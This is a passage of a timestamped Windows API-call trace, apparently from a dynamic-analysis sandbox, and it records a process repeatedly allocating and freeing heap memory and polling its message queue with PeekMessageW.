wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.387] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9e0 [0121.387] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9e0 | out: hHeap=0x12c0000) returned 1 [0121.387] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.388] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2a8 [0121.388] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0121.388] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.388] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.388] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491918 [0121.388] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491918 | out: hHeap=0x12c0000) returned 1 [0121.388] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.388] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0121.388] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0121.388] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2a8 | out: hHeap=0x12c0000) returned 1 [0121.388] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.389] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0121.389] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.389] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.389] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.389] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b58 [0121.389] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b58 | out: hHeap=0x12c0000) returned 1 [0121.389] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0121.389] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.389] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0121.389] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0121.390] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.390] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.390] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0121.390] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0121.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.390] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.390] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.390] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.390] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.390] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efaa0 [0121.391] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918b8 [0121.391] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918b8 | out: hHeap=0x12c0000) returned 1 [0121.391] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efaa0 | out: hHeap=0x12c0000) returned 1 [0121.391] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.391] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a58 [0121.391] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.391] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a58 | out: hHeap=0x12c0000) returned 1 [0121.391] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.391] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9b0 [0121.391] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8e0 [0121.391] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0121.391] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0121.391] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8e0 | out: hHeap=0x12c0000) returned 1 [0121.392] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0121.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0121.392] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.392] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0121.392] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9b0 [0121.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef950 [0121.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0121.392] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0121.392] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef950 | out: hHeap=0x12c0000) returned 1 [0121.392] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0121.392] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0121.392] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.393] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0121.393] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.393] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9e0 [0121.393] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0121.393] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0121.393] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0121.393] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0121.393] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9e0 | out: hHeap=0x12c0000) returned 1 [0121.393] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0121.393] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.393] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0121.393] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.393] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.393] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8e0 [0121.394] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.394] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.394] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8e0 | out: hHeap=0x12c0000) returned 1 [0121.394] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.394] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.394] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.394] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.394] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.394] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8d0 [0121.394] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa50 [0121.394] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.394] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.394] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa50 | out: hHeap=0x12c0000) returned 1 [0121.394] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8d0 | out: hHeap=0x12c0000) returned 1 [0121.394] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.394] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.395] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.395] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0121.395] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.395] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0121.395] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.395] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.396] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.396] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9e0 [0121.396] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0121.396] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b78 [0121.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b78 | out: hHeap=0x12c0000) returned 1 [0121.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0121.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9e0 | out: hHeap=0x12c0000) returned 1 [0121.396] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458898 [0121.396] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458898 | out: hHeap=0x12c0000) returned 1 [0121.396] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.396] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.396] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef990 [0121.396] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef990 | out: hHeap=0x12c0000) returned 1 [0121.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.396] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.396] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.396] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.396] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9d0 [0121.397] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa10 [0121.397] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0121.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0121.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0121.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9d0 | out: hHeap=0x12c0000) returned 1 [0121.397] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.397] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.397] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.397] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0121.397] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef970 [0121.397] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef970 | out: hHeap=0x12c0000) returned 1 [0121.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.398] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.398] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.398] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.398] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa10 [0121.398] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0121.398] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918d8 [0121.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918d8 | out: hHeap=0x12c0000) returned 1 [0121.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0121.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0121.398] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0121.398] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.398] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0121.399] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efaa0 [0121.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efaa0 | out: hHeap=0x12c0000) returned 1 [0121.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.399] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.399] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.399] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef960 [0121.399] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0121.400] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0121.400] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0121.400] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.400] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0121.400] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.400] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0121.400] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.400] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.400] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa10 [0121.400] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.400] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.400] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa10 | out: hHeap=0x12c0000) returned 1 [0121.400] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.400] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.401] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.401] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.401] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.401] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0121.401] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0121.401] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b78 [0121.401] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b78 | out: hHeap=0x12c0000) returned 1 [0121.401] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0121.401] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0121.401] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0121.401] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.401] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0121.402] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.402] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0121.402] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.402] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0121.402] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.403] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9f0 [0121.403] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.403] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.403] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.404] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.404] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 